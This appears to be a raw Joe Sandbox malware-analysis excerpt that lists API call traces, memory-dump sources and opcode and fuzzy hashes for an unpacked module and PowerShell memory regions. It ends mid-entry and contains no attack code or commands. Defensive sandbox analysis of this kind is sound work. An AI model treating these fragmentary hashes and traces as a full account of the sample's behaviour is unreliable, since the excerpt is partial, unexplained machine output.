• WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,0030EA9F,00000000,00000000,00000000,00000000,00000000,00303FBF), ref: 0030E70C
• GetLastError.KERNEL32(?,0030EA9F,00000000,00000000,00000000,00000000,00000000,00303FBF,00000000,00303FBF,0031AA70,00000010,0030D947,00000000,0031A9E8,00000010), ref: 0030E735
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: S#~>
• API String ID: 442123175-2989149754
• Opcode ID: 09a5c12f17fb5156477d4c0564c91b70bfffcb5e091c08e193d42767472adbd2
• Instruction ID: 082a0b7cdbcb7cefa9cf9b20e2b796a90a017025121e02bb9b58ee7c648708b6
• Opcode Fuzzy Hash: 09a5c12f17fb5156477d4c0564c91b70bfffcb5e091c08e193d42767472adbd2
• Instruction Fuzzy Hash: 67319171B112199BCB25CF69DC809DAF3FAEF48710F1088AAE509D72A0E730A981CB54

APIs
• WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,0030EABF,00000000,00000000,00000000,00000000,00000000,00303FBF), ref: 0030E61E
• GetLastError.KERNEL32(?,0030EABF,00000000,00000000,00000000,00000000,00000000,00303FBF,00000000,00303FBF,0031AA70,00000010,0030D947,00000000,0031A9E8,00000010), ref: 0030E647
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: S#~>
• API String ID: 442123175-2989149754
• Opcode ID: 9c2490903c6f2642ed60500c36732cf02e32362a88dc01e18aaf5f4557c85a6d
• Instruction ID: 4a91f12921bba1a4b6b7587625cfd7a80d58be152241f3840c1717d9eb343f12
• Opcode Fuzzy Hash: 9c2490903c6f2642ed60500c36732cf02e32362a88dc01e18aaf5f4557c85a6d
• Instruction Fuzzy Hash: D021E175B002189FCB26CF59DC90BEAB3F9EB08301F1048AAE94AD3291D730AD81CF10

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID:
• String ID: Shell.Explorer$about:blank
• API String ID: 0-874089819
• Opcode ID: 98392b4bc3fa5d948ea2cf7e655a167c7ea3e3d04aa5e82b0ed6e51cc37248c9
• Instruction ID: 4c1889d8481b554ffbcde36f0dde0dab5f49f328110ec58f7ecd9563d591795c
• Opcode Fuzzy Hash: 98392b4bc3fa5d948ea2cf7e655a167c7ea3e3d04aa5e82b0ed6e51cc37248c9
• Instruction Fuzzy Hash: DB21507162060ABFD7049FA4C895E76F768FF49390B04413AE61587682DF70E861CB91
APIs
• IsWindowVisible.USER32(000104A4), ref: 002FCA6D
• DialogBoxParamW.USER32(GETPASSWORD1,000104A4,002FA0B0,?,?), ref: 002FCAA9
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: DialogParamVisibleWindow
• String ID: GETPASSWORD1
• API String ID: 3157717868-3292211884
• Opcode ID: 78429543ced1f82f5d06d03595cbf3b771e5e22d55163c4faf1c8c53b57df64f
• Instruction ID: 69078c8a102dfb422d313089ff71790a6fd38376de6f8c575e9beaed24583742
• Opcode Fuzzy Hash: 78429543ced1f82f5d06d03595cbf3b771e5e22d55163c4faf1c8c53b57df64f
• Instruction Fuzzy Hash: 93113B3222420C66DB23DE349D02BFBB398BB0E750F144079FE49A7181C7B4AC60D794
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002FE82E
• ___raise_securityfailure.LIBCMT ref: 002FE915
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: FeaturePresentProcessor___raise_securityfailure
• String ID: S#~>
• API String ID: 3761405300-2989149754
• Opcode ID: e6a992773637b92997f374ce642847ff527b9ed85b26530e5400beca2914ef88
• Instruction ID: 9e1c6ea886b6d75bc6c2a34572f7eda7bfa97b9ad03630ee8635d6cf458f4b89
• Opcode Fuzzy Hash: e6a992773637b92997f374ce642847ff527b9ed85b26530e5400beca2914ef88
• Instruction Fuzzy Hash: C821FEB59102049FDB06DF18FAC2A54BBA8FB0A710F90417AEE08CB3B5E3B05881CF40
APIs
  • Part of subcall function 002ED70B: _swprintf.LIBCMT ref: 002ED731
  • Part of subcall function 002ED70B: _strlen.LIBCMT ref: 002ED752
  • Part of subcall function 002ED70B: SetDlgItemTextW.USER32(?,0031D154,?), ref: 002ED7B2
  • Part of subcall function 002ED70B: GetWindowRect.USER32(?,?), ref: 002ED7EC
  • Part of subcall function 002ED70B: GetClientRect.USER32(?,?), ref: 002ED7F8
• GetDlgItem.USER32(00000000,00003021), ref: 002E131B
• SetWindowTextW.USER32(00000000,003122E4), ref: 002E1331
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: ItemRectTextWindow$Client_strlen_swprintf
• String ID: 0
• API String ID: 2622349952-4108050209
• Opcode ID: d6455289ed35fa6ccfe01f7ef7142335357fa927b551e150d14c1559e2339534
• Instruction ID: 7ff0c3c939e427cdcbf39442a84222cdb816154509298c22d6df9f21ef24b347
• Opcode Fuzzy Hash: d6455289ed35fa6ccfe01f7ef7142335357fa927b551e150d14c1559e2339534
• Instruction Fuzzy Hash: D7F0C8705902C9A7DF160F229C0ABF93B6DAF09344F408064FC55514A1C778C5B5DB10
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: Free
• String ID: FlsFree$S#~>
• API String ID: 3978063606-2254333746
• Opcode ID: 30d39b952b6634c4923e13c092a75c63467ebf998dbc3380dc6c8064ea225f77
• Instruction ID: 010b251b66a135e5c5a6947f6742fb06620680573703065ac9c7453bc52d2704
• Opcode Fuzzy Hash: 30d39b952b6634c4923e13c092a75c63467ebf998dbc3380dc6c8064ea225f77
• Instruction Fuzzy Hash: 1DE05571A06208A7C613ABA0AC02FFEBB68DB0CB20F01006AFD055B2C1DA700E20D6C9
APIs
• WaitForSingleObject.KERNEL32(?,000000FF,002F05D9,?,?,002F064E,?,?,?,?,?,002F0638), ref: 002F04C0
• GetLastError.KERNEL32(?,?,002F064E,?,?,?,?,?,002F0638), ref: 002F04CC
  • Part of subcall function 002E6CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002E6CEC
Strings
• WaitForMultipleObjects error %d, GetLastError %d, xrefs: 002F04D5
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: ErrorLastObjectSingleWait__vswprintf_c_l
• String ID: WaitForMultipleObjects error %d, GetLastError %d
• API String ID: 1091760877-2248577382
• Opcode ID: 75b4c6a6953823a1c202d534b6cf7ef3ff1653dc7a0fc8ab84fbd1005309d22e
• Instruction ID: 603e1b1026c976c4e11c5de8c03d4b22f8b46458f036a302265ada1e7f15e204
• Opcode Fuzzy Hash: 75b4c6a6953823a1c202d534b6cf7ef3ff1653dc7a0fc8ab84fbd1005309d22e
• Instruction Fuzzy Hash: E0D05E3155903267D60627246C0EEEF791ADB2A3B0FA0C719FA35652F6CA200CB1C6D6
APIs
• GetModuleHandleW.KERNEL32(00000000,?,002ECFBE,?), ref: 002ED6C6
• FindResourceW.KERNEL32(00000000,RTL,00000005,?,002ECFBE,?), ref: 002ED6D4
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: FindHandleModuleResource
• String ID: RTL
• API String ID: 3537982541-834975271
• Opcode ID: f146e6a44e0b6c2924d17ff08c204c3ea65bc8e29b750cd4161201a05a90873c
• Instruction ID: 0057dac7389d70c411883c257dbd7ac3b6e87d303db973a4cdce4aa8929d7a99
• Opcode Fuzzy Hash: f146e6a44e0b6c2924d17ff08c204c3ea65bc8e29b750cd4161201a05a90873c
• Instruction Fuzzy Hash: 87C01231A8135266EB361B317D0DBC32A4CAB0CB12F1A0548FA85DA1D0DAE5C8A0C6A0
Memory Dump Source
• Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 38d822f8d009720deaa4902f641c74b10174f58f74d4bf30c37bedef05afb536
• Instruction ID: e26a86b06fc46e1cade71ef1d0836f31f7a4c4daa526d112a324df5b493fbb46
• Opcode Fuzzy Hash: 38d822f8d009720deaa4902f641c74b10174f58f74d4bf30c37bedef05afb536
• Instruction Fuzzy Hash: 0B917EB1B407146FEB55EFB888109AEBBE3EF84B00B00891DD506AB750DF74AE059BD5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b234a9b176ef048fb86449fb8b10a801b7cf4bd43fd198169bdc08a82be1e015
                                                                                                                                              • Instruction ID: 9e5fd66ae69694616f301db737f9aa08b1ab101756f49a7cb4183cca138b6d30
                                                                                                                                              • Opcode Fuzzy Hash: b234a9b176ef048fb86449fb8b10a801b7cf4bd43fd198169bdc08a82be1e015
                                                                                                                                              • Instruction Fuzzy Hash: 29916FB1B407146FEB55EFB888109AEBBE3EF84B00B00891DD506AB750DF74AE059BD5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1908846068.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_6e20000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: abf98f8b224eb99bfb39634f00846e500dc47d59e0895c96f56420fb530ba04a
                                                                                                                                              • Instruction ID: 0061ed423a455555a2f5b756ff37c4565638654082d60ca5a0bdfef8933a57cb
                                                                                                                                              • Opcode Fuzzy Hash: abf98f8b224eb99bfb39634f00846e500dc47d59e0895c96f56420fb530ba04a
                                                                                                                                              • Instruction Fuzzy Hash: F7225831B10326DFDB648F69D8407AAB7E7EF89214F14807AEA05CB251DB75CE41C7A2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1908846068.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_6e20000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 27107c4c4b98c3883e36ae938684c1797f5ee87c9011ec10f0c1c1445973bbf6
                                                                                                                                              • Instruction ID: fc65480e11ca23eb83dc41b4c6c76a7c6dcaefdd8b868b3c4a0182ea7ee4c926
                                                                                                                                              • Opcode Fuzzy Hash: 27107c4c4b98c3883e36ae938684c1797f5ee87c9011ec10f0c1c1445973bbf6
                                                                                                                                              • Instruction Fuzzy Hash: 99120932B04326CFD7559B68D8007AABBE3AF85254F14807AD506CB391DA79CD85CBA2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 523162a6de040eb68f63a3d211c9a7da4d4f15b777279144d5b8b2f708d74daa
                                                                                                                                              • Instruction ID: 84c741d759d146851589e8a74c1a0b98bb1f907ebf2a20715794b783eb5203f2
                                                                                                                                              • Opcode Fuzzy Hash: 523162a6de040eb68f63a3d211c9a7da4d4f15b777279144d5b8b2f708d74daa
                                                                                                                                              • Instruction Fuzzy Hash: D9811474B002048FEB14DF68D498AA9BBF6FF8D215F2544A9E406EB3A1DB35EC41DB50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: af2f5de2d4b72ba7fa5edea34e46932f1d163a245e2a78c8fab9c0c92ec63b8c
                                                                                                                                              • Instruction ID: 7248eedb01164125b564a48bdb628a9cfb2fb298b9d5e91449b7fd698595c15d
                                                                                                                                              • Opcode Fuzzy Hash: af2f5de2d4b72ba7fa5edea34e46932f1d163a245e2a78c8fab9c0c92ec63b8c
                                                                                                                                              • Instruction Fuzzy Hash: F2919A74A00645CFDB15CF58C494AAAFBB1FF88310F2486AAE915AB364C735FC51CBA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3b348a8ffd41dbc7d7119bdb008d6e12ac8dd73ce8bbcf379afa1c1d5bc9cad1
                                                                                                                                              • Instruction ID: e909125c77af446227a173e88fbc9feff745b5ac551da1a888d66f260e147117
                                                                                                                                              • Opcode Fuzzy Hash: 3b348a8ffd41dbc7d7119bdb008d6e12ac8dd73ce8bbcf379afa1c1d5bc9cad1
                                                                                                                                              • Instruction Fuzzy Hash: 6C611971E012499FEB14DFA9D544B8DFBF1FF88314F18816AE819AB260EB74AD41CB50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 670a1ec1fe786c6a862971bb3d68a62be268517ca70a216d1c5b875458c92513
                                                                                                                                              • Instruction ID: 600cf668ddfce27323da1e0ea41ecc021c3224c7c94353ac6a13a71c30779d83
                                                                                                                                              • Opcode Fuzzy Hash: 670a1ec1fe786c6a862971bb3d68a62be268517ca70a216d1c5b875458c92513
                                                                                                                                              • Instruction Fuzzy Hash: 0851A0353042059FE714DB79E844A6A77EAFFCC214F2484A9E50ACB361EB35EC019B90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fc001f7bc5b60afe6a9ec75c6d71667b60c93906d26b4830da9d207b9228bab5
                                                                                                                                              • Instruction ID: 53f4f02f4851fdf8b695795cd1cd820afcc8918fbca099bde003390a486d3a3c
                                                                                                                                              • Opcode Fuzzy Hash: fc001f7bc5b60afe6a9ec75c6d71667b60c93906d26b4830da9d207b9228bab5
                                                                                                                                              • Instruction Fuzzy Hash: 3C5119B5E012499FDB14DFA9D584B8DBBF1FF88314F188069E919AB360EB34AD41CB50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1908846068.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_6e20000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d02d99a37d4e41e83aa86c1678740739a5d9756ea9d240b058f4b27e82630570
                                                                                                                                              • Instruction ID: 1d1bf2d1d3bac5e19842eeb8f77b0da6ff923ff47cc0e6828f6b8f838eaa7be6
                                                                                                                                              • Opcode Fuzzy Hash: d02d99a37d4e41e83aa86c1678740739a5d9756ea9d240b058f4b27e82630570
                                                                                                                                              • Instruction Fuzzy Hash: 7C412831F00322CFDB958F2885416AB77B3AF80654B15805AD9069F351DB3DDD85CFA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3bde8b01187ad9520171ea20a38c47c18059f7144ade7021c082279d346bcf84
                                                                                                                                              • Instruction ID: 4279af8fa90cfede74899ae8746b601b1ac72eaf520e91ef503e07f809f7810a
                                                                                                                                              • Opcode Fuzzy Hash: 3bde8b01187ad9520171ea20a38c47c18059f7144ade7021c082279d346bcf84
                                                                                                                                              • Instruction Fuzzy Hash: BB318071304601AFE705EB78E844B9EB796FFC8215F048529D60ACB361DF75E805CB91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 27a0169d96fca80f9a607d3e0c90a1cb230a93839ddb401d322387b632c02d24
                                                                                                                                              • Instruction ID: 06295da7c95d2e8b1c21119c8e9dfd6c5e05a8afb3a98f3cfca9b108272bbb0f
                                                                                                                                              • Opcode Fuzzy Hash: 27a0169d96fca80f9a607d3e0c90a1cb230a93839ddb401d322387b632c02d24
                                                                                                                                              • Instruction Fuzzy Hash: AF310674B042058FEB14CF58E594AA9BBF2FF8D211F2450A8E406EB3A5DB71EC41DB64
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6378777f40ed055d894738e9a10cd9b57e95091ae0dcc3c0dd839c22ae417806
                                                                                                                                              • Instruction ID: 6fd31bc55a115fe078fb764f89705c864374234257f03aeab653c50058dc5a52
                                                                                                                                              • Opcode Fuzzy Hash: 6378777f40ed055d894738e9a10cd9b57e95091ae0dcc3c0dd839c22ae417806
                                                                                                                                              • Instruction Fuzzy Hash: 62316D74E012099FEB04DF69D4957AEBBF2EFC8310F108029E415EB364EB74AC059B91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Opcode Fuzzy Hash: ac9503b541aefc0e802cedcaf88c931628b838da2430c6461a5650c072708686
                                                                                                                                              • Instruction Fuzzy Hash: 32F0C8363093A01FD7118A799C409BB7FEDDB8652070440BBF554C7392C965CD00D7A0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b890ab2d239399e013032a5f0d45f95168743da86aa98d3d9f3ad9550817f607
                                                                                                                                              • Instruction ID: bd46c301e78a702339f91b55c5dd9a5d03c272620773657c1d2593845a8f155c
                                                                                                                                              • Opcode Fuzzy Hash: b890ab2d239399e013032a5f0d45f95168743da86aa98d3d9f3ad9550817f607
                                                                                                                                              • Instruction Fuzzy Hash: 62018435B05204AFCB04EB64E8559EDBFB2EF8C220F04446AD506A7355DE356D45CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 767769e053d16ed9816ee4e833f1239d5f6db7c842aa6f412bbc5f7b9febed0b
                                                                                                                                              • Instruction ID: 4e14cd484c6a0698c7ea365341d640f155df46f9d31c4e9d3faf80143c502f6b
                                                                                                                                              • Opcode Fuzzy Hash: 767769e053d16ed9816ee4e833f1239d5f6db7c842aa6f412bbc5f7b9febed0b
                                                                                                                                              • Instruction Fuzzy Hash: 9EF0BE323083645FD7108A6A9C449BBBFEDEBC9620B04407AF944C3351CAB1CC0096A0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1895840811.00000000043FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 043FD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_43fd000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fda60e3aa0cbb8d3d7e7ab4b15efff2f402c5b468935096ace3882dde1609b81
                                                                                                                                              • Instruction ID: bd2a92bf2d71b8841469e3e4fbbe983a99137468099c22ba38ca5e1d9a02297b
                                                                                                                                              • Opcode Fuzzy Hash: fda60e3aa0cbb8d3d7e7ab4b15efff2f402c5b468935096ace3882dde1609b81
                                                                                                                                              • Instruction Fuzzy Hash: 16F0F976200600AF97208F0ADD85C23FBADEBD4770719C59AE94A8BA12D671FC41DEA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: bc81229f459e55840eacc9e92c72b6b6471fe9aca85a57c75ee5ebdb0d88edef
                                                                                                                                              • Instruction ID: 5c8e32b291e6114001655567b29a11ceb40f99dcaf861a9067b0b2f6f79ab598
                                                                                                                                              • Opcode Fuzzy Hash: bc81229f459e55840eacc9e92c72b6b6471fe9aca85a57c75ee5ebdb0d88edef
                                                                                                                                              • Instruction Fuzzy Hash: DFF0F6B66046045BF710AF68E4547DB7B66EFC5318F10806AC9055B745CE393C45CBE1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1895840811.00000000043FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 043FD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_43fd000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 22be56efe1741f2e14e54c883acfd1825a0eb07f66fad42458ef2a7890fda658
                                                                                                                                              • Instruction ID: 16f392346880f946f6a5372061e8f72e073add3fbd5591d98cdc7eafb58af063
                                                                                                                                              • Opcode Fuzzy Hash: 22be56efe1741f2e14e54c883acfd1825a0eb07f66fad42458ef2a7890fda658
                                                                                                                                              • Instruction Fuzzy Hash: 67F04976100A40AFD720CF06CD84D23BBB9EB85620B19C489A88A8B712D671FC02CFA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 12ff7d2f6c4d1951daace46aabbe5562258d8455245c6b1ca82d443ee8e7da45
                                                                                                                                              • Instruction ID: 31cbd5a1eefe6d56fbfad9ac024a5cf687f0c57fa1a131782cd0b1efa42252c0
                                                                                                                                              • Opcode Fuzzy Hash: 12ff7d2f6c4d1951daace46aabbe5562258d8455245c6b1ca82d443ee8e7da45
                                                                                                                                              • Instruction Fuzzy Hash: 6BF08C393042808FD3218F2CD494D76BBFAAFCA21531910DAE489DB736CAA0EC15CB40
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
